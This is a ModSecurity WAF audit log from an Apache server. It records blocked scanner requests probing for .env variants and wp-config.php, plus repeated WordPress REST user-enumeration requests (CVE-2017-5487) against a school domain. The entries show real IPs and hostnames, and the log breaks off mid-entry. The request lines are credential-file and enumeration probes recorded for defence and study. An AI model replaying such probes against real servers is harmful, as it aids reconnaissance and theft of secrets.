combined=362, p1=327, p2=0, p3=0, p4=0, p5=35, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --59f04342-Z-- --14dd0527-A-- [16/May/2025:17:54:45 +0700] aCcZdUE0LfP59mkCzg4XmgAAAMU 103.236.140.4 54440 103.236.140.4 8181 --14dd0527-B-- GET /.env.dist HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 93.123.109.229 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 93.123.109.229 X-Forwarded-Proto: https Connection: close User-Agent: l9explore/1.2.2 --14dd0527-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --14dd0527-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747392885768721 775 (- - -) Stopwatch2: 1747392885768721 775; combined=333, p1=288, p2=0, p3=0, p4=0, p5=45, sr=114, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --14dd0527-Z-- --56c1f52e-A-- [16/May/2025:17:54:48 +0700] aCcZeEE0LfP59mkCzg4XpAAAANU 103.236.140.4 54586 103.236.140.4 8181 --56c1f52e-B-- GET /.env_sample HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 93.123.109.229 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 93.123.109.229 X-Forwarded-Proto: https Connection: close User-Agent: l9explore/1.2.2 --56c1f52e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --56c1f52e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747392888603066 723 (- - -) Stopwatch2: 1747392888603066 723; combined=303, p1=266, p2=0, p3=0, p4=0, p5=36, sr=69, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --56c1f52e-Z-- --3c485910-A-- [16/May/2025:17:54:52 +0700] aCcZfEE0LfP59mkCzg4XpgAAANY 103.236.140.4 54764 103.236.140.4 8181 --3c485910-B-- GET /.env.uat HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 93.123.109.229 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 93.123.109.229 X-Forwarded-Proto: https Connection: close User-Agent: l9explore/1.2.2 --3c485910-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3c485910-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747392892075588 756 (- - -) Stopwatch2: 1747392892075588 756; combined=338, p1=303, p2=0, p3=0, p4=0, p5=35, sr=120, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3c485910-Z-- --3156f864-A-- [16/May/2025:17:54:56 +0700] aCcZgEE0LfP59mkCzg4XuwAAANI 103.236.140.4 55006 103.236.140.4 8181 --3156f864-B-- GET /.env.bak HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 93.123.109.229 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 93.123.109.229 X-Forwarded-Proto: https Connection: close User-Agent: l9explore/1.2.2 --3156f864-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3156f864-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747392896962144 773 (- - -) Stopwatch2: 1747392896962144 773; combined=325, p1=279, p2=0, p3=0, p4=0, p5=46, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3156f864-Z-- --287a8e09-A-- [16/May/2025:17:54:59 +0700] aCcZg8e47ocjCGWTS4Yg8wAAAEA 103.236.140.4 55148 103.236.140.4 8181 --287a8e09-B-- GET /.env.dev.local HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 93.123.109.229 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 93.123.109.229 X-Forwarded-Proto: https Connection: close User-Agent: l9explore/1.2.2 --287a8e09-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --287a8e09-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747392899630592 695 (- - -) Stopwatch2: 1747392899630592 695; combined=294, p1=261, p2=0, p3=0, p4=0, p5=33, sr=89, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --287a8e09-Z-- --e4c2c35a-A-- [16/May/2025:18:02:38 +0700] aCcbTte6THFz1hsaJaLDRgAAAAQ 103.236.140.4 51406 103.236.140.4 8181 --e4c2c35a-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 66.76.253.142 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 66.76.253.142 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --e4c2c35a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e4c2c35a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747393358713646 24423 (- - -) Stopwatch2: 1747393358713646 24423; combined=1838, p1=423, p2=1382, p3=0, p4=0, p5=33, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e4c2c35a-Z-- --30d1a803-A-- [16/May/2025:18:50:54 +0700] aCcmnthEtho3ciA0wehaoQAAAIk 103.236.140.4 42822 103.236.140.4 8181 --30d1a803-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.80.2 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.80.2 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.49 Safari/537.36 Accept-Charset: utf-8 --30d1a803-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --30d1a803-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747396254661578 713 (- - -) Stopwatch2: 1747396254661578 713; combined=308, p1=275, p2=0, p3=0, p4=0, p5=32, sr=114, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --30d1a803-Z-- --b461387d-A-- [16/May/2025:19:45:46 +0700] aCczekE0LfP59mkCzg4wGQAAAMQ 103.236.140.4 43512 103.236.140.4 8181 --b461387d-B-- GET /wp-config.php HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 142.93.103.28 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http Accept: */* User-Agent: Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force Cookie: X-Forwarded-For: 142.93.103.28 Accept-Encoding: gzip X-Varnish: 148842250 --b461387d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --b461387d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747399546885528 974 (- - -) Stopwatch2: 1747399546885528 974; combined=346, p1=309, p2=0, p3=0, p4=0, p5=37, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b461387d-Z-- --f9c7953a-A-- [16/May/2025:20:49:16 +0700] aCdCXMe47ocjCGWTS4Y77AAAAEk 103.236.140.4 45412 103.236.140.4 8181 --f9c7953a-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 103.75.60.19 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 103.75.60.19 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --f9c7953a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f9c7953a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747403356818258 2400 (- - -) Stopwatch2: 1747403356818258 2400; combined=1115, p1=371, p2=699, p3=0, p4=0, p5=45, sr=69, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f9c7953a-Z-- --0cb23854-A-- [16/May/2025:21:23:01 +0700] aCdKRdhEtho3ciA0wehbUAAAAJI 103.236.140.4 46384 103.236.140.4 8181 --0cb23854-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 37.130.34.82 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 37.130.34.82 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --0cb23854-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0cb23854-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747405381946278 2764 (- - -) Stopwatch2: 1747405381946278 2764; combined=1267, p1=443, p2=794, p3=0, p4=0, p5=30, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0cb23854-Z-- --6e679063-A-- [16/May/2025:22:10:57 +0700] aCdVgce47ocjCGWTS4Y8XQAAAEc 103.236.140.4 47648 103.236.140.4 8181 --6e679063-B-- GET /.env HTTP/1.0 Host: wooin.epicgamer.org X-Real-IP: 46.101.111.185 X-Forwarded-Host: wooin.epicgamer.org X-Forwarded-Server: wooin.epicgamer.org X-Forwarded-For: 46.101.111.185 X-Forwarded-Proto: http Connection: close User-Agent: Go-http-client/1.1 --6e679063-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6e679063-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747408257813923 802 (- - -) Stopwatch2: 1747408257813923 802; combined=317, p1=281, p2=0, p3=0, p4=0, p5=36, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6e679063-Z-- --acfb8e2d-A-- [16/May/2025:22:39:10 +0700] aCdcHkE0LfP59mkCzg4ynwAAAME 103.236.140.4 48086 103.236.140.4 8181 --acfb8e2d-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 109.175.7.204 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 109.175.7.204 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --acfb8e2d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --acfb8e2d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747409950822696 3057 (- - -) Stopwatch2: 1747409950822696 3057; combined=1339, p1=435, p2=875, p3=0, p4=0, p5=29, sr=81, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --acfb8e2d-Z-- --04bbf81a-A-- [16/May/2025:23:44:12 +0700] aCdrXEE0LfP59mkCzg40PwAAAMs 103.236.140.4 50126 103.236.140.4 8181 --04bbf81a-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 162.0.235.252 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 162.0.235.252 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --04bbf81a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --04bbf81a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747413852297396 3446 (- - -) Stopwatch2: 1747413852297396 3446; combined=1480, p1=515, p2=934, p3=0, p4=0, p5=30, sr=125, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --04bbf81a-Z-- --60ddeb20-A-- [17/May/2025:00:00:13 +0700] aCdvHUE0LfP59mkCzg40TQAAAMY 103.236.140.4 50248 103.236.140.4 8181 --60ddeb20-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 51.81.29.157 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 51.81.29.157 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --60ddeb20-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --60ddeb20-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747414813269498 3443 (- - -) Stopwatch2: 1747414813269498 3443; combined=1427, p1=474, p2=921, p3=0, p4=0, p5=31, sr=79, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --60ddeb20-Z-- --16151541-A-- [17/May/2025:00:07:06 +0700] aCdwuse47ocjCGWTS4Y93QAAAFc 103.236.140.4 50336 103.236.140.4 8181 --16151541-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 18.162.52.197 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 18.162.52.197 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --16151541-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --16151541-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747415226341161 3590 (- - -) Stopwatch2: 1747415226341161 3590; combined=1431, p1=483, p2=916, p3=0, p4=0, p5=32, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --16151541-Z-- --3ef60d70-A-- [17/May/2025:00:08:31 +0700] aCdxD8e47ocjCGWTS4Y94QAAAEU 103.236.140.4 50352 103.236.140.4 8181 --3ef60d70-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 103.133.107.28 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 103.133.107.28 X-Forwarded-Proto: http Connection: close User-agent: Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30 Accept: */* --3ef60d70-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3ef60d70-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747415311746513 897 (- - -) Stopwatch2: 1747415311746513 897; combined=362, p1=305, p2=0, p3=0, p4=0, p5=56, sr=80, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3ef60d70-Z-- --f8ef7f67-A-- [17/May/2025:00:08:32 +0700] aCdxEMe47ocjCGWTS4Y94wAAAEc 103.236.140.4 50356 103.236.140.4 8181 --f8ef7f67-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 103.133.107.28 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 103.133.107.28 X-Forwarded-Proto: https Connection: close User-agent: Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30 Accept: */* --f8ef7f67-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f8ef7f67-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747415312805927 880 (- - -) Stopwatch2: 1747415312805927 880; combined=364, p1=328, p2=0, p3=0, p4=0, p5=36, sr=100, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f8ef7f67-Z-- --95073f53-A-- [17/May/2025:00:19:04 +0700] aCdziEE0LfP59mkCzg40bAAAAMo 103.236.140.4 50420 103.236.140.4 8181 --95073f53-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 197.248.170.89 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 197.248.170.89 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --95073f53-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --95073f53-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747415944095993 2681 (- - -) Stopwatch2: 1747415944095993 2681; combined=1216, p1=406, p2=782, p3=0, p4=0, p5=28, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --95073f53-Z-- --7323881b-A-- [17/May/2025:00:25:21 +0700] aCd1Ace47ocjCGWTS4Y97gAAAEI 103.236.140.4 50460 103.236.140.4 8181 --7323881b-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 213.77.99.142 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 213.77.99.142 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --7323881b-F-- HTTP/1.1 